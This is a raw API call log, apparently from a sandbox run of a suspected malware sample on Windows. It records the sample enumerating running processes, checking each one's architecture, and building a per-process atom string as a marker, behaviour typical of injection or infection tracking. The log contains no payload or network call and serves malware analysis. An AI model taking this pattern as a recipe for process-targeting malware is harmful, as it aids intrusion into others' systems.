	[0074.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x772200, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0074.443] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.443] CloseHandle (hObject=0x224) returned 1
	[0074.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x728a98, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0074.443] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.443] CloseHandle (hObject=0x224) returned 1
	[0074.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x7721a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.443] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0074.443] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.443] CloseHandle (hObject=0x224) returned 1
	[0074.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x7721b8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0074.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x772218, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0074.444] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.444] CloseHandle (hObject=0x224) returned 1
	[0074.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0074.444] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.444] CloseHandle (hObject=0x224) returned 1
	[0074.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0074.444] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.444] CloseHandle (hObject=0x224) returned 1
	[0074.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x728978, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0074.444] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x7721a0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.444] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0074.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.445] CloseHandle (hObject=0x224) returned 1
	[0074.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x728958, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0074.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.445] CloseHandle (hObject=0x224) returned 1
	[0074.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x72dc80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0074.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0074.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.445] CloseHandle (hObject=0x224) returned 1
	[0074.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x728958, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0074.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0074.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.445] CloseHandle (hObject=0x224) returned 1
	[0074.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x72eb30, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0074.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0074.445] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.445] CloseHandle (hObject=0x224) returned 1
	[0074.445] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x728a98, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.445] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0074.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.446] CloseHandle (hObject=0x224) returned 1
	[0074.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x772158, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0074.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.446] CloseHandle (hObject=0x224) returned 1
	[0074.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x7721a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0074.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.446] CloseHandle (hObject=0x224) returned 1
	[0074.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x728a58, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0074.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0074.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.446] CloseHandle (hObject=0x224) returned 1
	[0074.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x7287f8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0074.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0074.446] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.446] CloseHandle (hObject=0x224) returned 1
	[0074.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x772218, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.446] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0074.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.447] CloseHandle (hObject=0x224) returned 1
	[0074.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x772200, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0074.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.447] CloseHandle (hObject=0x224) returned 1
	[0074.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x72ea90, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0074.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0074.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.447] CloseHandle (hObject=0x224) returned 1
	[0074.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0074.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.447] CloseHandle (hObject=0x224) returned 1
	[0074.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x772158, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.447] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0074.447] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.447] CloseHandle (hObject=0x224) returned 1
	[0074.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x7287f8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0074.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0074.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.448] CloseHandle (hObject=0x224) returned 1
	[0074.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x7721d0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0074.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0074.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.448] CloseHandle (hObject=0x224) returned 1
	[0074.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x728998, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0074.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0074.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.448] CloseHandle (hObject=0x224) returned 1
	[0074.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x72e798, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0074.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0074.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.448] CloseHandle (hObject=0x224) returned 1
	[0074.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x72eab8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0074.448] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.448] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.448] CloseHandle (hObject=0x224) returned 1
	[0074.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x772170, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0074.449] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.449] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.450] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0074.450] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.450] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] wsprintfA (in: param_1=0x770458, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.451] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetLastError () returned 0x5
	[0074.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.452] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0074.452] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0074.452] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0074.452] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0074.452] CloseHandle (hObject=0x224) returned 1
	[0074.452] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0074.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=12, lpMultiByteStr=0x7721b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 12
	[0074.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x37c) returned 0x224
	[0074.453] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.453] CloseHandle (hObject=0x224) returned 1
	[0074.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LocationNotificationWindows.exe", cchWideChar=31, lpMultiByteStr=0x72e7e8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocationNotificationWindows.exe", lpUsedDefaultChar=0x0) returned 31
	[0074.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0074.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x772200, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.453] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0074.453] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0074.453] CloseHandle (hObject=0x224) returned 1
	[0074.453] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x772218, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0074.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x27eff10 | out: SystemInformation=0x0, ResultLength=0x27eff10*=0x16d18) returned 0xc0000004
	[0074.488] VirtualAlloc (lpAddress=0x0, dwSize=0x16e18, flAllocationType=0x3000, flProtect=0x4) returned 0x2bb0000
	[0074.488] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2bb0000, Length=0x16e18, ResultLength=0x0 | out: SystemInformation=0x2bb0000, ResultLength=0x0) returned 0x0
	[0074.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0074.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x772188, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0074.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0074.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x772170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0074.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x772188, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0074.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0074.490] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x7721a0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0074.490] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
